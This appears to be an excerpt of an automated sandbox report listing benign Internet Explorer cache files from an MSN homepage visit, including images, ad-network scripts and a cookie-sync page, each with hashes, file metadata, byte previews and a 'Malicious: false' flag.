IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9g6y.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...8....g...c]>8..('..V-..K(..L........S.f..Q%.2...z........o.....v?.....Mit.c.p...]... ....s........R.xc.F...-.d..O......F.L<..%?.....I.L...C.......).c....d..............(.&.Wi........P.4rs..S9....{.........Q6....c..)...o!...(.4.@.a>.c.4...+..Ny...i.....K.b..S.+............w....c.4.1.......6%")..YI.f..Ih'.Q$g....tz{.1......H>.._..._.H'.......1.-3..Z...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1b9kRT[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	7146
Entropy (8bit):	7.918145929704268
Encrypted:	false
SSDEEP:	192:BCcx6wIIDw+LjROwXOWMDzuW9ogWjkOdYM0TilDG4:kq6wIwRXXk9Wjk2l0Tkd
MD5:	C279B11564E982511FF0BC2DDF4232E4
SHA1:	A02D050636C888D2F8B11DCDEE27986F385393A1
SHA-256:	56E82576ECA1624A72A9569D5C81F9D684FC3FBA32BED8BFFC4D593893D4A66F
SHA-512:	9C0A64B38C99BF34812AC065F92619B7EC78E0E4AFC80ADA103B23F3280A7BBF4170E1E0D341E776CD684A23B2ECC5410941720845C2FD5FBB00DDC9BA1A5D0C
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9kRT.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=648&y=154
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...A.A....au....g...`....3^.....p......R...N:]...B.(...(....(...(...(...(...(...(...(...(...(..."H..\|..W..P...{......>.A.).8<..Z KX..p.g..+..ed.......(...)i(......Zk..g`.;.Z..S.}.....!...8.....I.+...#...fK..U....+..5.g.......!.[...IU%..<g.(.I.Y#`.. ....]..?.[5.c..s.(.D.u.QEY.E.P.E.P.E.P.E.P..I.....^x!H5.~....NP....3....\.....88.t...1z.....p......YGsy...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1b9qFj[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	20120
Entropy (8bit):	7.961191148339748
Encrypted:	false
SSDEEP:	384:ePezR41qrb8PtPhguk9FRYJDDHH8nzb+sHkPuQtxdFLlvV6S:ePArbMxWN9uDDn8zb+sHOuQPdl5
MD5:	F45E9837484AFEBA67F3A1E6E4035E32
SHA1:	1628053990C3F14D8E3E0EC8E6BC36C637156F9C
SHA-256:	E268477AFC09E124019E318F89C64B3221B2446470E8AFA940202782BC9B3FA1
SHA-512:	6F8D34DA285B9DCEE136B3A70CBD5A07987ECFB8E2F2D895D99ACDB15CEBED0F67ADBE3A6868CE5C5FC59D3DB06AD4FCDDF85B3A3717A9644C2D93E87AA63C26
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9qFj.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h...#..(....R..QKE.%-.P.E-..(......(.QKE.%-.P.E-.......LQ.Z1@\m..b...qE-.....P1))h..h...bRS.(..)h.1.QE2B.(...Z)...b...QK@.KE-.%....J\T.s<J.5.6q......8.[9.E..g..._....,.6.BsWE.Q..j...6..p....CNx.t]....P?....."..P..\Ud.....m..r.1..(.Z.Pv.......t..h...8..Q.j...s...?..O.^...O......O...1T..........'......u\r..yx...EO.....B.)1P.k.G.0.q..z`.......+..o^....#..BlQ..iz

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1b9sGa[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	12820
Entropy (8bit):	7.938029643648503
Encrypted:	false
SSDEEP:	192:BYrJqexsmziCiltLqreSi6fZIxCHKY51kvlwcQHG6Hg+ivnQOHs7kRLwb2:erJqosCqta9hgoK+SvfBTnPsotwb2
MD5:	9F03D3F1A5EF24EA2A461064825FA0DE
SHA1:	78FEB4A5C2A8A709439BD2B1049488E352E7787E
SHA-256:	3AF49DE4708938C4E5A874B0D2777625391C03BC8B485E3F818D66BB05749AEF
SHA-512:	6B8DE068AA9A3412E1420879EF3AE98C88A5E14A65E0E530DC1B687CE911142621D3942446664CDB6BA46EB73CB197B7426A4E9486D5C1215878ABC6D1212133
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9sGa.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(..=..(.....(...(...(...(...(...(...(...(...(.....S.........(...(...(...(...(...)h..../.5$...t../&........%....G..8.&...O..d...;..I..[.C.g.o5/....6.8....,...;....G....5.J............O@Mk.!TB....R..1....wfe@.>..f....I...2.........S.W..?..w6......=).c>.R0y.. ...P..Jv("..e....(...(...(...)i(....M.4.&h.f.`6.(..E.P.E.P.E.P.E.P.Vl......9&.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1b9yFR[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	downloaded
Size (bytes):	4302
Entropy (8bit):	7.819521772090227
Encrypted:	false
SSDEEP:	96:BGEEanaHVkyznAO38MaXJlJuqpy1RscX5YMvqU8m2:BFJNyjACr4DJuDRD+MvCm2
MD5:	BA6FD3D23AC90CBCE7E4E81AC85C98DC
SHA1:	389B8A48255A1BCC97964E6DC195CD5D43198CEF
SHA-256:	00A1B0A71BFB7EB17B05EC46AAA805DC3741B9AE2D408977DECF209CAD43D997
SHA-512:	16B2C3C23E0E747C47201055AC217903AA9A3773D9E56E9754754EB232244952D92582E08F6ED95B2678B591C85C226F94662F9A34BD167888DC7CDCB7291BE8
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b9yFR.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1729&y=1568
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......E....R.V...).R..H...x..B.O...x.L..(...4S.T.h.q.HsT..V...5JS[..EiN..f.....Z#.!4.ph.%.."".DF...Fy.h..S..0.F.....}.zt...}....zp....5E...p.F}..Q.F..q.[G.....\|..Nj......'.WP..'....3SF.c$.#.J...T.aNGZR>\.*.q.....].g..1X.@<....oZ.P.FA.4.-....1\3.\7.l.q....61.t..)^....`x....Xu......RWG...ii...T`-.Q@.IKE.%%-%0.(..6TT.).T.W.{B.......E..8R.p.&8S..f..".&h-.5..d..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB7gRE[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	482
Entropy (8bit):	7.256101581196474
Encrypted:	false
SSDEEP:	12:6v/78/kFLsiHAnE3oWxYZOjNO/wpc433jHgbc:zLeO/wc433Cc
MD5:	307888C0F03ED874ED5C1D0988888311
SHA1:	D6FB271D70665455A0928A93D2ABD9D9C0F4E309
SHA-256:	D59C8ADBE1776B26EB3A85630198D841F1A1B813D02A6D458AF19E9AAD07B29F
SHA-512:	6856C3AA0849E585954C3C30B4C9C992493F4E28E41D247C061264F1D1363C9D48DB2B9FA1319EA77204F55ADBD383EFEE7CF1DA97D5CBEAC27EC3EF36DEFF8E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....wIDAT8O.RKN.0.}v\....U....-.. ......8..{$...z..@.....+.......K...%)...I......C4.../XD].Y..:.w.....B9..7..Y..(.m.3. .!..p..,.c.>.\<H.0....,w:.F..m...8c,.^........E.......S...G.%.y.b....Ab.V.-.}.=..."m.O..!...q.....]N.)..w..\..v^.^...u...k..0.....R.....c!.N...DN`)x..:.."*Brg.0avY.>.h...C.S...Fqv._.]......E.h.\|Wg..l........@.$.Z.]....i8.$).t..y.W..H..H.W.8..B...'............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB7hg4[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	458
Entropy (8bit):	7.172312008412332
Encrypted:	false
SSDEEP:	12:6v/78/kFj13TC93wFdwrWZdLCUYzn9dct8CZsWE0oR0Y8/9ki:u138apdLXqxCS7D2Y+
MD5:	A4F438CAD14E0E2CA9EEC23174BBD16A
SHA1:	41FC65053363E0EEE16DD286C60BEDE6698D96B3
SHA-256:	9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
SHA-512:	FD41BCD1A462A64E40EEE58D2ED85650CE9119B2BB174C3F8E9DA67D4A349B504E32C449C4E44E2B50E4BEB8B650E6956184A9E9CD09B0FA5EA2778292B01EA5
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J...._IDAT8O.RMJ.@...&.....B%PJ.-.......... ...7..P..P....JhA..$Mf..j.n.~.y...}...:...b...b.H<.)...f.U...fs`.rL....}.v.B..d.15..\T..Z_..'.}..rc....(...9V.&.....\|.qd...8.j..... J...^..q.6..KV7Bg.2@).S.l#R.eE.. ..:_.....l.....FR........r...y...eIC......D.c......0.0..Y..h....t....k.b..y^..1a.D..\|...#.ldra.n.0.......:@.C.Z..P....@...*......z.....p....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\a8a064[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 28 x 28
Category:	downloaded
Size (bytes):	16360
Entropy (8bit):	7.019403238999426
Encrypted:	false
SSDEEP:	384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
MD5:	3CC1C4952C8DC47B76BE62DC076CE3EB
SHA1:	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
SHA-256:	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
SHA-512:	5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Preview:	GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........\|~\|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........\|~\|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20537
Entropy (8bit):	5.298766072012455
Encrypted:	false
SSDEEP:	384:kpAG36OllD7XFe0uvg2f5vzBgF3OZOvQWwY4RXrqt:O93D5GY2RmF3OsvQWwY4RXrqt
MD5:	C9CF45FCD6632935F60B9293377E7654
SHA1:	A3D9A6D3DD7C48C3FD454F3557EE4C42846166F0
SHA-256:	B5D357B8223145A17B1FE9D3778B771840CAE2EC4C5B831B3E6454ACF34A804A
SHA-512:	80592EECD6992F979F37436FACF455CC752630B93276023B5650488580E6009D87E1178CDB540DFD33DD377184A8C15737987F238B634E1924C2E0E98DBD6012
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":72,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20537
Entropy (8bit):	5.298766072012455
Encrypted:	false
SSDEEP:	384:kpAG36OllD7XFe0uvg2f5vzBgF3OZOvQWwY4RXrqt:O93D5GY2RmF3OsvQWwY4RXrqt
MD5:	C9CF45FCD6632935F60B9293377E7654
SHA1:	A3D9A6D3DD7C48C3FD454F3557EE4C42846166F0
SHA-256:	B5D357B8223145A17B1FE9D3778B771840CAE2EC4C5B831B3E6454ACF34A804A
SHA-512:	80592EECD6992F979F37436FACF455CC752630B93276023B5650488580E6009D87E1178CDB540DFD33DD377184A8C15737987F238B634E1924C2E0E98DBD6012
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":72,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fcmain[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	38109
Entropy (8bit):	5.1030267558243425
Encrypted:	false
SSDEEP:	768:71av1Ub8Dn/e9W94h37YbxYXf9wOBEZn3SQN3GFl295obPvljyB79vlPsGJ:hQ1UbOEWmh37YbxYXf9wOBEZn3SQN3Gi
MD5:	A2944473FD2E74852C7AC4FD4E09EBFB
SHA1:	CC4BB0791301623DED53486567CF981E7D0D0B8A
SHA-256:	79A10AAEB38A75B969324C73E489BCAD2612809E5092AD143F0FE880D1E31A3D
SHA-512:	94374F9FE13BFE9D863AFEADB2683134F7478988CD5C10F068E8C07901F838464EF66EABC49B1CE72A44466CEB462F1F8F9180688934AB8DCF774514B3DB4F22
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1605773513406255291&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1605773513406255291","s":{"_mNL2":{"size":"306x271","viComp":"1605771676807031045","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305231","l2ac":""},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1605773513406255291\")) \|\| (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fcmain[2].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	36947
Entropy (8bit):	5.13486503066378
Encrypted:	false
SSDEEP:	768:P1avo7Ub8Dn/eJW94hCXNHwYXf9wOBEZn3SQN3GFl295oRl/+i/Kl/rsO:dQ+UbO8WmhCXNHwYXf9wOBEZn3SQN3GM
MD5:	B75B416FFBB5AB10C76D0EB1CAA35605
SHA1:	3BB507A5275C581D4122388273E796EA4D0D6494
SHA-256:	5425F8AACB70A0446598AB49A3379CDF2037327CD46CDEFD98B11281172165C7
SHA-512:	2820C06A1A7BCD576AE1CB06FED784786CDDF80261C690787DE1BE2605B3BE50BC3F2581278D23E7157100D8E531808FF42086FC41F72DF65032BB7B8655708B
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1605773513332011179&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1605773513332011179","s":{"_mNL2":{"size":"306x271","viComp":"1605772284784578521","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305290","l2ac":""},"_mNe":{"pid":"8PO8WH2OT","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=858412214#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"858412214\",\"1605773513332011179\")) \|\| (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\39ab3103-8560-4a55-bfc4-401f897cf6f2[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	downloaded
Size (bytes):	64434
Entropy (8bit):	7.97602698071344
Encrypted:	false
SSDEEP:	1536:uvrPk/qeS+g/vzqMMWi/shpcnsdHRpkZRF+wL7NK2cc8d55:uvrsSb7XzB0shpOWpkThLRyc8J
MD5:	F7E694704782A95060AC87471F0AC7EA
SHA1:	F3925E2B2246A931CB81A96EE94331126DEDB909
SHA-256:	DEEBF748D8EBEB50F9DFF0503606483CBD028D255A888E0006F219450AABCAAE
SHA-512:	02FEFF294B6AECDDA9CC9E2289710898675ED8D53B15E6FF0BB090F78BD784381E4F626A6605A8590665E71BFEED7AC703800BA018E6FE0D49946A7A3F431D78
Malicious:	false
IE Cache URL:	https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................Q............................!.1A."Qaq......#2...$B...3Rb.%CS...&4Tr..(56cs.....................................F......................!...1..AQ"aq.2....BR....#3..Cb....$Sr..&FTc...............?...N..m.1$!..l({&.l...Uw.Wm...i..VK.KWQH.9..n...S~.....@xT.%.D.?....}Nm.;&.....y.qt8...x.2..u.TT.=.TT...k........2..j.J...BS...@'.a....6..S/0.l,.J.r...,<3~...,A....V.G..'....5].....p...#Yb.K.n!'n..w..{o..._........1..I...).(.l.4......z[}.Z....D2.y...o..}.=..+i.=U.....J$.(.IH0.-...uKSUmP..T.5..H.6.....6k,8.E....".n.......pMk+..,q...n)GEUM..UUwO%O...)CJ&.P.2!!..........D.z...W...Q..r.t..6]... U.;m...^..:.k.ZO9...#...q2....mTu..Ej....6.)Se.<......U.@...K.g\D.../..S....~.3 